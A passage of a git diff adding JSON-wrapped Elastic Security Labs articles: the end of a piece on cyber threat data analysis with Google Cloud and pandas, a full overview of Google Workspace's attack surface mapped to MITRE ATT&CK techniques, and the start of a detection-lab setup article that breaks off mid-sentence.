preparing it for detailed analysis.\n - **Trend analysis:** This phase provided in-depth insights into cyber attack tactics, techniques, and malware, forming the core of our analysis.\n\nWhile the detailed data in our Colab Notebooks is extensive and informative for an analyst, it might be too complex for a broader audience. Therefore, the reduction phase focuses on distilling this information into a more concise and accessible form. The aim is to make the findings clear and understandable, ensuring that they can be effectively communicated and utilized across various departments or stakeholders.\n\n## Selecting and aggregating key data points\n\nIn order to effectively communicate our findings, we must tailor the presentation to the audience's needs. Not every stakeholder requires the full depth of collected data; many prefer a summarized version that highlights the most actionable points. This is where data selection and aggregation come into play, focusing on the most vital elements and presenting them in an accessible format.\n\nHere's an example of how to use Pandas to aggregate and condense a dataset, focusing on key aspects of endpoint behavior:\n\n```\nrequired_endpoint_behavior_cols = ['rule_name','host_os_type','tactic_name','technique_name']\n\n\nreduced_behavior_df = df.groupby(required_endpoint_behavior_cols).size()\n .reset_index(name='count')\n .sort_values(by=\"count\", ascending=False)\n .reset_index(drop=True)\n\ncolumns = {\n 'rule_name': 'Rule Name', \n 'host_os_type': 'Host OS Type',\n 'tactic_name': 'Tactic', \n 'technique_name': 'Technique', \n 'count': 'Alerts'\n}\n\nreduced_behavior_df = reduced_behavior_df.rename(columns=columns)\n```\n\nOne remarkable aspect of this code and process is the flexibility it offers. For instance, we can group our data by various data points tailored to our needs. Interested in identifying popular tactics used by adversaries? Group by the MITRE ATT&CK tactic. Want to shed light on masquerading malicious binaries? Revisit extraction to add more Elastic Common Schema (ECS) fields such as file path, filter on Defense Evasion, and aggregate to reveal the commonly trodden paths. This approach ensures we create datasets that are both enlightening and not overwhelmingly rich, tailor-made for stakeholders who wish to understand the origins of our analysis.\n\nThis process involves grouping the data by relevant categories such as rule name, host OS type, and MITRE ATT&CK tactics and techniques and then counting the occurrences. This method helps in identifying the most prevalent patterns and trends in the data.\n\n\nDiagram example of data aggregation to obtain reduced dataset\n\n## Exporting reduced data to Google Sheets for accessibility\n\nThe reduced data, now stored as a dataframe in memory, is ready to be exported. We use Google Sheets as the platform for sharing these insights because of its wide accessibility and user-friendly interface. The process of exporting data to Google Sheets is straightforward and efficient, thanks to the integration with Google Cloud services.\n\nHere's an example of how the data can be uploaded to Google Sheets using Python from our Colab notebook:\n\n```\nauth.authenticate_user()\ncredentials, project = google.auth.default()\ngc = gspread.authorize(credentials)\nworkbook = gc.open_by_key(\"SHEET_ID\")\nbehavior_sheet_name = 'NAME_OF_TARGET_SHEET'\nendpoint_behavior_worksheet = workbook.worksheet(behavior_sheet_name)\nset_with_dataframe(endpoint_behavior_worksheet, reduced_behavior_df)\n```\n\nWith a few simple lines of code, we have effectively transferred our data analysis results to Google Sheets. This approach is widely used due to its accessibility and ease of use. However, there are multiple other methods to present data, each suited to different requirements and audiences. For instance, some might opt for a platform like [Looker](https://cloud.google.com/looker?hl=en) to present the processed data in a more dynamic dashboard format. This method is particularly useful for creating interactive and visually engaging presentations of data. It ensures that even stakeholders who may not be familiar with the technical aspects of data analysis, such as those working in Jupyter Notebooks, can easily understand and derive value from the insights.\n\n\n\nThis streamlined process of data reduction and presentation can be applied to different types of datasets, such as cloud SIEM alerts, endpoint behavior alerts, or malware alerts. The objective remains the same: to simplify and concentrate the data for clear and actionable insights.\n\n# Presentation: Showcasing the insights\n\nAfter meticulously refining our datasets, we now focus on the final stage: the presentation. Here we take our datasets, now neatly organized in platforms like Google Sheets or Looker, and transform them into a format that is both informative and engaging.\n\n## Pivot tables for in-depth analysis\n\nUsing pivot tables, we can create a comprehensive overview of our trend analysis findings. These tables allow us to display data in a multi-dimensional manner, offering insights into various aspects of cybersecurity, such as prevalent MITRE ATT&CK tactics, chosen techniques, and preferred malware families.\n\nOur approach to data visualization involves:\n\n - **Broad overview with MITRE ATT&CK tactics:** Starting with a general perspective, we use pivot tables to overview the different tactics employed in cyber threats.\n - **Detailed breakdown:** From this panoramic view, we delve deeper, creating separate pivot tables for each popular tactic and then branching out into detailed analyses for each technique and specific detection rule.\n\nThis methodical process helps to uncover the intricacies of detection logic and alerts, effectively narrating the story of the cyber threat landscape.\n\n\nDiagram showcasing aggregations funnel into contextual report information\n\n**Accessibility across audiences:** Our data presentations are designed to cater to a wide range of audiences, from those deeply versed in data science to those who prefer a more straightforward understanding. The Google Workspace ecosystem facilitates the sharing of these insights, allowing pivot tables, reduced datasets, and other elements to be easily accessible to all involved in the report-making process.\n\n**Integrating visualizations into reports:** When crafting a report, for example, in Google Docs, the integration of charts and tables from Google Sheets is seamless. This integration ensures that any modifications in the datasets or pivot tables are easily updated in the report, maintaining the efficiency and coherence of the presentation.\n\n**Tailoring the presentation to the audience:** The presentation of data insights is not just about conveying information; it's about doing so in a visually appealing and digestible manner. For a more tech-savvy audience, an interactive Colab Notebook with dynamic charts and functions may be ideal. In contrast, for marketing or design teams, a well-designed dashboard in Looker might be more appropriate. The key is to ensure that the presentation is clear, concise, and visually attractive, tailored to the specific preferences and needs of the audience.\n\n# Conclusion: Reflecting on the data analysis journey\n\nAs we conclude, it's valuable to reflect on the territory we've navigated in analyzing cyber threat data. This journey involved several key stages, each contributing significantly to our final insights.\n\n## Journey through Google's Cloud ecosystem\n\nOur path took us through several Google Cloud services, including GCP, GCE, Colab Notebooks, and Google Workspace. Each played a pivotal role:\n\n**Data exploration:** We began with a set of cyber-related questions we wanted to answer and explored what vast datasets we had available to us. In this blog, we focused solely on telemetry being available in BigQuery.\n**Data extraction:** We began by extracting raw data, utilizing BigQuery to efficiently handle large volumes of data. Extraction occurred in both BigQuery and from within our Colab notebooks.\n**Data wrangling and processing:** The power of Python and the pandas library was leveraged to clean, aggregate, and refine this data, much like a chef skillfully preparing ingredients.\n**Trend analysis:** We then performed trend analysis on our reformed datasets with several methodologies to glean valuable insights into adversary tactics, techniques, and procedures over time.\n**Reduction:** Off the backbone of our trend analysis, we aggregated our different datasets by targeted data points in preparation for presentation to stakeholders and peers.\n**Transition to presentation:** The ease of moving from data analytics to presentation within a web browser highlighted the agility of our tools, facilitating a seamless workflow.\n\n## Modularity and flexibility in workflow\n\nAn essential aspect of our approach was the modular nature of our workflow. Each phase, from data extraction to presentation, featured interchangeable components in the Google Cloud ecosystem, allowing us to tailor the process to specific needs:\n\n**Versatile tools:** Google Cloud Platform offered a diverse range of tools and options, enabling flexibility in data storage, analysis, and presentation.\n**Customized analysis path:** Depending on the specific requirements of our analysis, we could adapt and choose different tools and methods, ensuring a tailored approach to each dataset.\n**Authentication and authorization:** Due to our entities being housed in the Google Cloud ecosystem, access to different tools, sites, data, and more was all painless, ensuring a smooth transition between services.\n\n## Orchestration and tool synchronization\n\nThe synergy between our technical skills and the chosen tools was crucial. This harmonization ensured that the analytical process was not only effective for this project but also set the foundation for more efficient and insightful future analyses. The tools were used to augment our capabilities, keeping the focus on deriving meaningful insights rather than getting entangled in technical complexities.\n\nIn summary, this journey through data analysis emphasized the importance of a well-thought-out approach, leveraging the right tools and techniques, and the adaptability to meet the demands of cyber threat data analysis. The end result is not just a set of findings but a refined methodology that can be applied to future data analysis endeavors in the ever-evolving field of cybersecurity.\n\n# Call to Action: Embarking on your own data analytics journey\n\nYour analytical workspace is ready! What innovative approaches or experiences with Google Cloud or other data analytics platforms can you bring to the table? The realm of data analytics is vast and varied, and although each analyst brings a unique touch, the underlying methods and principles are universal.\n\nThe objective is not solely to excel in your current analytical projects but to continually enhance and adapt your techniques. This ongoing refinement ensures that your future endeavors in data analysis will be even more productive, enlightening, and impactful. Dive in and explore the world of data analytics with Google Cloud!\n\nWe encourage any feedback and engagement for this topic! If you prefer to do so, feel free to engage us in Elastic’s public [#security](https://elasticstack.slack.com/archives/C018PDGK6JU) Slack channel."
+ },
+ "title": "Google Cloud for Cyber Data Analytics",
+ "slug": "google-cloud-for-cyber-data-analytics",
+ "subtitle": "Navigating the seas of cyber threat data with Google Cloud",
+ "date": "2023-12-14",
+ "description": "This article explains how we conduct comprehensive cyber threat data analysis using Google Cloud, from data extraction and preprocessing to trend analysis and presentation. It emphasizes the value of BigQuery, Python, and Google Sheets - showcasing how to refine and visualize data for insightful cybersecurity analysis.",
+ "author": [
+ {
+ "slug": "terrance-dejesus"
+ },
+ {
+ "slug": "eric-forte"
+ }
+ ],
+ "image": "photo-edited-12.png",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ],
+ "tags": [
+ "google cloud"
+ ]
+ },
+ "id": "security_labs_content-google_cloud_for_cyber_data_analytics-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-google_workspace_attack_surface_part_one-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-google_workspace_attack_surface_part_one-md.json
new file mode 100644
index 00000000000..76cb21d632a
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-google_workspace_attack_surface_part_one-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Google Workspace Attack Surface\"\nslug: \"google-workspace-attack-surface-part-one\"\ndate: \"2023-01-03\"\nsubtitle: \"Part One: Surveying the Land\"\ndescription: \"During this multipart series, we’ll help you understand what GW is and some of the common risks to be aware of, while encouraging you to take control of your enterprise resources.\"\nauthor:\n - slug: terrance-dejesus\nimage: \"photo-edited-01-e.jpg\"\ncategory:\ntags:\n - threat detection\n - cloud security\n - google workspace\n - google cloud\n---\n\n# Preamble\n\nFormerly known as GSuite, Google Workspace (GW) is a collection of enterprise tools offered by Google. Popular services such as Google Drive, Gmail and Google Forms are used by many small and midsize businesses (SMBs), as well as larger organizations.\n\nWhen referring to security, GW is often mentioned because a threat is abusing or targeting services and resources. As practitioners, it is essential we consider risks associated and plan defenses accordingly. Importantly, Microsoft and Amazon offer some of the same services: if there’s a “least risk” option among them we haven’t seen evidence of it yet, and each prioritizes their own form of visibility.\n\nDuring this multipart series, we’ll help you understand what GW is and some of the common risks to be aware of, while encouraging you to take control of your enterprise resources: - Part One - Surveying the Land - Part Two - Setup Threat Detection with Elastic - Part Three - Detecting Common Threats\n\nIn this publication, readers will learn more about common resources and services in GW and how these are targeted by threats. This will provide an overview of administration, organizational structures, identity access and management (IAM), developer resources, and a few other topics you should think about.\n\nBut before we begin, let’s highlight the importance of organizations also taking ownership of this attack surface. If you’re using these enterprise tools and don’t consider them part of your enterprise, that is the challenge to overcome first. Know where your visibility extends to, know which capabilities you can exercise within that range, and don’t mistake vendor-operated for vendor-secured.\n\n# Common Services Targeted by Threats\n\n[Services and applications](https://workspace.google.com/features/) available in GW include cloud storage, email, identity and access management (IAM), chat and much more. Behind the scenes, [developers](https://developers.google.com/workspace) can access application programming interfaces (APIs) to interact programmatically with GW. Together, these services allow organizations of all sizes to provide users with their own Internet-accessible virtual “workspace”. However, threat actors have discovered trivial and advanced methods to abuse these services. While there is plenty of information to cover, we should start with administration as it provides an overview of GW and will help set the stage for more in-depth context about applications or developer resources.\n\n## Administration\n\nFew GW users are aware of the admin console or the settings it exposes, unless they happen to also be an administrator. The admin console is the central command center for GW administrators to manage the services and resources of their organization. The term “organization” is directly referenced by the primary domain registered with GW and therefore is the root node of GW. Only user accounts with administrative roles can sign-in and access their organization’s admin console.\n\n\n\nGW employs a directory service-like structure that defines users, groups, organizational units (OUs), roles and other attributes of the enterprise for easy navigation. While the admin console is not inherently a risk, compromised valid accounts ([T1078.004](https://attack.mitre.org/techniques/T1078/004/)) with that level of privilege expose organizations to greater risk.\n\nAside from IAM, administrators use the admin console to manage applications available to their organization. The most popular of these being Gmail, Drive and Docs, Google Meet, Google Forms, Google Sheets and Calendar. Additional Google services can be added, though most are enabled by default when setting up your GW; such as Chrome Remote Desktop. Depending on the OU configuration, permissions for users to these applications may be inherited from the root OU. The principles of least privilege (PoLP) and application control are critical to reducing organizational risk within GW.\n\n\n\nAdministrators can also manage mobile and endpoint device enrollment, as well as network related settings from the admin console. Administrators can add devices by uploading a CSV containing the serial number, which can be assigned to a user. For corporate-owned devices, this provides convenient auditing that may unfortunately become necessary. Universal settings for mobile devices are also available, allowing data and setting synchronization for iOS, Android and Google devices. GW allows mobile device management (MDM), allowing admins to apply local changes using [Open Mobile Alliance - Uniform Resources](https://learn.microsoft.com/en-us/troubleshoot/mem/intune/deploy-oma-uris-to-target-csp-via-intune) (OMA-URIs).\n\nCoincidentally, making changes to remote enterprise endpoints is also a popular goal of adversaries.\n\nGW admins have the capability to create and manage Wi-Fi, Ethernet, VPN and Cellular networks. For cellular devices this is typically done via the Subscription Management Root-Discovery Service (SM-DP) which is used to connect eSIM devices to a mobile network. VPN and proxy settings can be configured as well with routing through Google’s DNS infrastructure by default or custom routing if chosen.\n\nWindows endpoints can also be managed via GW, with the capability to modify settings and synchronize data with Active Directory (AD) or an existing LDAP server. This is accomplishable with GW’s [Google Cloud Directory Sync](https://support.google.com/a/answer/106368?hl=en) (GCDS). Settings can be applied to each endpoint, such as BitLocker, automatic updates or authentication via [Google Credential Provider for Windows](https://support.google.com/a/answer/9250996?hl=en) (GCPW). GCPW allows users to login to a Windows endpoint with their Google account for authentication. Users with sufficient privileges can make changes to remote enterprise endpoints by configuring a [custom policy](https://support.google.com/a/answer/10181140#zippy=%2Cwindows-device-management%2Ccustom-settings) through the configuration service provider (CSP). This is possible with the Windows 10 enterprise platform, which exposes endpoint configuration settings that allow GW, as a MDM service to read, set, modify or delete configuration settings. Microsoft has an [extensive list](https://learn.microsoft.com/en-us/windows/configuration/provisioning-packages/how-it-pros-can-use-configuration-service-providers#a-href-idbkmk-csp-docahow-do-you-use-the-csp-documentation) of CSP settings that are exposed for management via custom policies. While integration between platforms is important to daily operations, this service equips adversaries with the capability to expand their intrusion into the Windows ecosystem.\n\n## Organizational Structure\n\nThe digital structure of an enterprise in GCP or GW is often hierarchical: where the registered domain is the top-level, parent, or root, and any nested organizations under this are used for the grouping and permission scoping.\n\nAn important subject to understand for GW are OUs, which can be thought of as “departments” within an organization and can have subsidiary OUs. The hierarchy starts with a top-level OU, typically from the primary domain registration and organization name where child units can be added as needed. Service and application access are then inherited from the top-level OU if not specified. Users assigned to an OU will have access to any services and resources as inherited.\n\nAs an alternative, administrators can create and manage access groups to add an additional layer of resource-based control. Users who are assigned to an access group will inherit access and permissions from those set for the group itself, which may bypass restrictions set on the OU they are assigned to. For example, if an OU for engineering is without access to Drive and Docs, a user is assigned to an access group with access to Drive and Docs can bypass the child OU settings.\n\n\n\nGW’s organizational structure and layered approach to access control enables administrators to scope roles easier for users. Unfortunately, incomplete or misconfigured access controls could allow unexpected permission inheritance from the top-level OU. Access restrictions could unexpectedly be bypassed by users outside their expected access groups, thus introducing insider threat risk via additional cloud roles ([T1098.003](https://attack.mitre.org/techniques/T1098/003/)).\n\n## Identity Access and Management\n\n### Identity vs Account\n\nThe identity of users when using Google’s services is that of the account being used, often the email address. Identity does differ from user account slightly in that the identity of a user is unique, but the user account is a data structure keeping track of configurations, attributes, activities and more when interacting with Google’s services.\n\nStandalone Gmail addresses (@gmail.com) are consumer accounts typically meant to be used by a private individual, whereas Gmail addresses with a registered domain name are managed user accounts as their lifecycle and configuration are fully managed by the organization. Therefore, when we discuss IAM in this publication, the context is typically towards managed user accounts whose identity and data is managed by the GW organization.\n\nHowever, the relationship between identity and account does not have to be 1:1, meaning an email address, or identity, can be tied to two separate user accounts. If an organization does not enforce a new and separate identity for their users, risk looms around the private user account whom’s settings are managed by the user themselves, not the organization. In this example, the widespread use of valid compromised accounts undermines the ability of defenders to identify when this is malicious versus benign.\n\n### Machine Accounts\n\nMachine accounts exist and allow developers to interact with Google services and resources programmatically. These are not managed within GW, but rather Google Cloud Platform (GCP) via the use of service accounts. A bridge exists in the form of domain-wide delegation between GW and GCP.\n\nThis feature authorizes GCP service accounts to access data, resources, services and much more within GW via application APIs. OAuth2 is the protocol used for authentication between GCP service accounts and GW.\n\nThe most common risk of this approach is with the storage and use of service account credentials. Since service accounts often have elevated privileges due to their automation and programmatic intentions, adversaries prioritize finding these credentials, such as a Linux cloud worker. Often, public/private key pairs are stored insecurely for local scripts or programs that use them. Adversaries can then discover the unsecured credentials ([T1552](https://attack.mitre.org/techniques/T1552/)) from a text file, extract them from memory, environment variables or even log files. Once compromised, adversaries have a bridge into GW from GCP with a valid service account that may be monitored less diligently than a user account.\n\n### Roles and Groups\n\nWithin GW, role-based access control (RBAC) only exists at the administrative level. This means the default and custom roles can be set up and configured from the admin console, however, the privileges available are mainly administrative. As we discussed earlier, Google’s hierarchy is top-down starting with the root OU, followed by child OUs; resources and services are enabled or disabled on a per-OU basis. By default a non-admin user belongs under the root OU, thus inheriting any access explicitly set at the root level where global privileges should be minimal.\n\nNot to be confused with Google’s Group application, access groups allow administrators to set specific access and privileges to resources and services at the user-level, similar to role-level controls. Typically, a group is created and then privileges to resources and services are assigned. Users are then added as members to those specific groups, overriding or superseding inherited privileges from the OU.\n\n### External Identities\n\nAs stated before, Gmail’s email names are unique IDs so users can use the same ID for both their consumer account and managed user accounts with the use of an external identity provider (IdP). This process typically requires single sign-on (SSO) via security assertion markup language (SAML) and therefore the IdP must recognize the identity before they can sign on.\n\nAuthentication is relayed from GW to the SAML IdP and relies on trusting the external provider’s identification verification. This is even true for active directory (AD) services or Okta where those become the external authoritative source. Data in transit during the SAML SSO process presents the greatest risk, and intercepted SAML responses to the IdP may be used to authenticate via forged credentials ([T1606.002](https://attack.mitre.org/techniques/T1606/002/)).\n\n## Developer Resources\n\nThere are two methods for programmatically interacting with GW: Google [Apps Script](https://workspace.google.com/products/apps-script/)and [REST APIs](https://developers.google.com/workspace). Google Apps Script is an application development platform for fast and easy business applications to better integrate with GW. Whereas, REST APIs provide a direct method of communicating with GW, often in cases where integration is not fast or easy. External interaction with GW is another benefit to REST APIs, as Apps Script is meant for internal use.\n\n### Apps Script\n\nWith Apps Script, developers use JavaScript with access to built-in libraries specific to each Google application. The term “rapid” is often emphasized because the platform is available at the domain, script.google.com, and tied directly to the organization the user is logged into, no installation at all. This tool can be extremely useful for accomplishing tasks in GW related to existing applications, administrative settings and more.\n\n\n\nEach coding application you create in Apps Script is known as a project and can be used by other GW tools. Within that project, you write your JavaScript code as you see fit. From its console, you can run, debug or view execution logs.\n\nThe project can also be deployed to your GW with versioning control as a web application, API executable, Add-on or Library. Script’s can also be deployed as libraries, making code shareable across projects. Last but not least, triggers can be set for each project where specific functions can be run at specific times allowing developers to choose which code blocks are executed and when.\n\n## Applications\n\nIn GW, the main attraction to organizations is typically the abundance of native applications offered by Google. Google’s Drive, Docs, Gmail, Sheets and Forms are just a few that are readily available to users for communication, storage, documentation or data gathering and analysis. All of these applications make up a user’s workspace, but are also targeted by adversaries because of their popularity and seamless integration with each other.\n\n\n\nTherefore it is essential to understand that while applications compliment each other in GW, they often require [authorization](https://developers.google.com/apps-script/guides/services/authorization) to each other where access rights have to be explicitly granted by the user. While security practitioners may generally be suspicious of applications requiring access, general users may not and grant access without thinking twice. This then allows malicious applications such as Apps Script functions contained in a Google Sheet, to access the private data behind each application.\n\n### Gmail\n\nArguably the most popular application provided by GW, Gmail has historically been abused by adversaries as a delivery mechanism for malicious attachments or links. For those unaware, Gmail is Google’s free email service with nearly 1.5 billion active users as of 2018, according to a statista [report](https://www.statista.com/statistics/432390/active-gmail-users/).\n\nPhishing ([T1566](https://attack.mitre.org/techniques/T1566/)) is often the most common technique conducted by adversaries with the help of Gmail, where stealing valid credentials is the goal. Victims are sent emails containing malicious attachments or links where malware may be installed or a user is redirected to a fake website asking for credentials to login. If account compromise occurs, this allows for internal spear phishing ([T1534](https://attack.mitre.org/techniques/T1534/)) attacks, potentially targeted towards an existing administrator.\n\nEmail collection ([T1114](https://attack.mitre.org/techniques/T1114/)) is another technique used by adversaries whose modus operandi (MO), may be to simply collect sensitive information. In GW, administrators have privileges to set custom global mail routes for specific users, groups or OUs, whereas users can create their own forwarding rules as well. Capability for an adversary to do so, whether manually or programmatically, comes down to valid account compromise and therefore signs of this activity may be found later in the intrusion process.\n\nTaking Gmail a step further, adversaries may also use GW’s web services ([T1102](https://attack.mitre.org/techniques/T1102/)) for command and control purposes as [identified](https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/) by ESET researchers regarding the ComRAT v4 backdoor of 2020. With attribution pointed towards advanced persistent threat (APT) group, Turla, the abuse of Gmail is also a tool for more advanced threats.\n\n### Drive\n\n[Google Drive](https://workspace.google.com/products/drive/), being a free digital storage service with an active Gmail account, is also a common target by adversaries. Where valid accounts are compromised, adversaries have the capability to steal private data stored in Google Drive. Sharing documents in Google Drive relies on a trust model, where the user can create a custom shareable link and invite others. Administrators have the capability to enable and expose public shared drives from their organization as well. Access and privileges rely on sharing permissions set by the owner or organization and the intended recipient for either the shareable link or Google cloud identity who has access to those shared objects.\n\nLet’s not forget that GW allows administrators to set up enterprise mobility management (EMM) and mobile device management (MDM) for mobile devices. These mobile devices then have access to private shared drives in an organization’s Google drive space. An adversary could take advantage of this to obtain unauthorized access to mobile devices via these remote services ([TA0039](https://attack.mitre.org/tactics/TA0039/)). Geographic coordinates of a mobile device or end user could also be obtained from such services if abused to do so.\n\nCommand and control via bidirectional communication ([T1102.002](https://attack.mitre.org/techniques/T1102/002/)) to a Google Drive is another option for adversaries who may be using the service to host and deploy malicious payloads as those from [APT29](https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/). Oftentimes, this reflects compromised web services ([T1584.006](https://attack.mitre.org/techniques/T1584/006/)) simply through a valid account and enabled Google Drive API. This is often the case when adversaries may leverage Google Drive to stage exfiltrated data programmatically prior to its final destination.\n\n### Docs\n\nIntegrated with Google Drive is [Google Docs](https://workspace.google.com/products/docs/), a free online word processing service where users can create documents which are then stored in their Google Drive. For collaboration purposes, documents have extensive markup capabilities, such as comments, which have recently been abused to distribute phishing and malware. This technique, [discussed](https://www.avanan.com/blog/google-docs-comment-exploit-allows-for-distribution-of-phishing-and-malware) by Check Point company, Avanan, allows adversaries to simply create a document and add a comment where they include the target’s email address and a malicious link, helping evade spam filters and security tools. Combining this phishing campaign with a native JavaScript application development platform such as Apps Script in GW would allow for expanded distribution with minimal costs. Luckily the extent of malicious Google documents ends with malicious links, but it would be immature to suggest adversaries will not eventually develop new techniques to abuse the service.\n\n### Sheets\n\nAs with Google Docs, [Google Sheets](https://workspace.google.com/products/sheets/) is another service often abused by adversaries to deliver malicious links or payloads. Google Sheets is a spreadsheet program, similar to Excel from Microsoft. Automated tasks can be created with the use of macros and of course triggers for those macros to be executed as well. While built-in functions exist, custom functions can be created via Google’s Apps Script platform and then imported into the Google Sheet document itself. Apps Script has native JavaScript libraries for interacting with other Google services and their respectful APIs. Thus if an adversary were to weaponize a Google Sheet document of their liking, resource development starts with a custom function, built with Apps Script. The function is imported into the Google Sheet and then shared with the intended target by commenting their email address and allowing access. Once triggered, the malicious code from the function would be executed and continue the intrusion process.\n\nA step further may be to share with them a [copy link](https://support.google.com/a/users/answer/9308866?hl=en), rather than an edit link which would copy the sheet containing the malicious macro to their own Google drive and upon execution carry out the intended task as the user since the sheet’s owner is now the target. For distribution, access to a user’s contacts within their GW organization, may allow worm-like capabilities as [discovered](https://nakedsecurity.sophos.com/2017/05/05/google-phish-thats-a-worm-what-happened-and-what-to-do/) by Sophos in 2017.\n\n## Marketplace\n\nGW’s [marketplace](https://apps.google.com/supportwidget/articlehome?hl=en&article_url=https%3A%2F%2Fsupport.google.com%2Fa%2Fanswer%2F172391%3Fhl%3Den&product_context=172391&product_name=UnuFlow&trigger_context=a) is an online application store with additional enterprise applications that can be integrated into an organization and accessed by users. Administrators are responsible for managing application accessibility and surveying risk associated with such apps. A large portion of these applications are 3rd-party and Google clearly states their [policies](https://developers.google.com/workspace/marketplace/terms/policies) for being a contributor. The risk associated with 3rd-party applications in the GW marketplace is access to private data from information repositories ([T1213](https://attack.mitre.org/techniques/T1213/)) or the resident data of the user and/or organization behind each application.\n\nGranted for administrators, when browsing applications, permission access can be reviewed via the application itself prior to installation. This way, administrators can review whether the risk inherited from such access is worth the solution it potentially may provide.\n\n\n\n## Reporting\n\nAs with most cloud consoles and environments, GW has a native reporting feature that helps administrators capture the activity in their environment. Located in the admin console of GW under Reporting, administrators have the following options.\n\n- Highlights - Dashboard of basic metrics for GW environments\n- Reports - Apps, cost, user and devices reporting in the form of basic dashboard metrics or tabled data about user accounts\n- Audit and Investigation - Location of all logs, categorized by activity\n- Manage Reporting Rules - Redirection to rules space, filtering on “Reporting” rules which are custom\n- Email Log Search - Search across the Gmail accounts of all users within the organization. Filters include Date, Sender, Sender IP, Recipient, Recipient IP, Subject and Message ID\n- Application Uptime - Uptime for applications enabled in the GW. Uptime is relative to Google’s infrastructure.\n\nOf this reporting, Google does a decent job of providing tabular data about user status and account activity in GW such as 2-step verification status and password strength, as well as additional security metrics. For example, shared links to Google resources that have been accessed outside of the domain. Additional user report documentation from Google can be found [here](https://apps.google.com/supportwidget/articlehome?hl=en&article_url=https%3A%2F%2Fsupport.google.com%2Fa%2Fanswer%2F4580176%3Fhl%3Den&product_context=4580176&product_name=UnuFlow&trigger_context=a).\n\nThe most reliable data is GW’s native logging, found under “Audit and Investigation”. As stated prior, these logs are organized into their own separate folders based on activity, application, identity or resource.\n\n\n\nLogs are stored in a tabular format with date, event, description, actor and IP address all being recorded by default. The description contains another layer of verbosity as to what activity occurred, oftentimes including JSON key and value pairs for specific values pulled from the GW for reporting.\n\nIn regards to threats, often adversaries will attempt indicator removal ([T1070](https://attack.mitre.org/techniques/T1070/)) by clearing audit logs to remove any potential footprints, however, GW audit logs are managed by Google and have [retention policies](https://apps.google.com/supportwidget/articlehome?hl=en&article_url=https%3A%2F%2Fsupport.google.com%2Fa%2Fanswer%2F7061566%3Fhl%3Den&product_context=7061566&product_name=UnuFlow&trigger_context=a) only. Therefore, it is essential to route audit logs from GW to an on-premise or cloud storage solution such as GCP via storage buckets. For more information on how Elastic’s GW integration routes audit logs, visit [here](https://docs.elastic.co/en/integrations/google_workspace).\n\n## Rules\n\nWhile GW provides a reporting feature that focuses on logging activity within an organization’s digital environment, it also has a detection rules feature as well.\n\nThese are not directly marketed as a security information and event management (SIEM) tool, but resemble that functionality. Shipped with some default rules, the “Rules” feature in GW allows administrators to automatically monitor for specific activity and set specific actions. Each rule allows you to customize the conditions for the rule to match on and of course what actions to perform when conditions are met. Rules are broken down into reporting, activity, data protection, system defined, or trust rules where custom creation and viewing require specific privileges.\n\n\n\nIn regards to granularity, administrators are at the mercy of data sourced from the audit logs when creating custom rules, whereas system defined rules provided by Google have additional data source insight. Rule alerts are directly accessible via the security alert center feature in GW, where further analysis, assignment, status and more can be edited.\n\n\n\n## Conclusion\n\nWith this introduction to GW as an attack surface, we hope you better understand the risks associated with these enterprise resources. Powerful virtual workspaces have become an essential capability of distributed productivity, which both establishes their utility and exposes them to threats. As adversaries continue to abuse GW, enterprises would be well-advised to understand its security while taking ownership of improving it. Proper administration, strong policy settings, IAM, and using the visibility they have are some of the recommendations we would offer.\n\nSoon we’ll release part two in this series and show you have to setup a threat detection lab for GW with Elastic components. And in our third publication, we’ll explore in-depth attack scenarios that reveal specific defensive strategies aligned to success.\n"
+ },
+ "title": "Google Workspace Attack Surface",
+ "slug": "google-workspace-attack-surface-part-one",
+ "subtitle": "Part One: Surveying the Land",
+ "date": "2023-01-03",
+ "description": "During this multipart series, we’ll help you understand what GW is and some of the common risks to be aware of, while encouraging you to take control of your enterprise resources.",
+ "author": [
+ {
+ "slug": "terrance-dejesus"
+ }
+ ],
+ "image": "photo-edited-01-e.jpg",
+ "category": null,
+ "tags": [
+ "threat detection",
+ "cloud security",
+ "google workspace",
+ "google cloud"
+ ]
+ },
+ "id": "security_labs_content-google_workspace_attack_surface_part_one-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-google_workspace_attack_surface_part_two-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-google_workspace_attack_surface_part_two-md.json
new file mode 100644
index 00000000000..0b0c143bed6
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-google_workspace_attack_surface_part_two-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Google Workspace Attack Surface\"\nslug: \"google-workspace-attack-surface-part-two\"\ndate: \"2023-01-03\"\nsubtitle: \"Part Two: Setup Threat Detection With Elastic\"\ndescription: \"During part two of this multipart series, we’ll help you understand how to setup a GW lab for threat detection and research.\"\nauthor:\n - slug: terrance-dejesus\nimage: \"photo-edited-01-e.jpg\"\ncategory:\ntags:\n - threat detection\n - cloud security\n - google workspace\n - google cloud\n---\n\n# Preamble\n\nAs a continuation of this series about Google Workspace’s (GW) attack surface, we diverge from surveying the land and focus on setting up a threat detection lab with Elastic. In [part one](https://www.elastic.co/security-labs/google-workspace-attack-surface-part-one), we explored the important resources and capabilities of GW, while tracking intrusion techniques that adversaries may leverage. In part two, we will give you the foundation needed to begin researching threats targeting GW, and provide resources for detecting those threats using Elastic technologies. The information used during the steps provided should be adjusted for your own lab and testing environment. If you do not feel the need to set up your own lab, that’s fine as this includes examples showing you how we detect threats to GW.\n\nFollowing this will be part three of this series, in which we cover common intrusion techniques by emulating the GW environment and simulating threat activity. In doing so, we’ll build detection logic to further detect several common techniques.\n\nElastic resources will be freely available but a registered domain for GW is necessary and will be covered in the upcoming steps, strictly for maximum authenticity. Approximate lab setup time is 20-30 minutes.\n\n## Let’s Get You Up to Speed\n\nFor those who may not be familiar with Elastic’s current stack: take a few minutes to review the current [solutions](https://www.elastic.co/blog/category/solutions) it offers. In short, the stack is an all-encompassing product that can be deployed anywhere from a single interface! If you would like to explore more information about the Elastic security solution, the [documentation](https://www.elastic.co/guide/en/security/current/getting-started.html) is a great 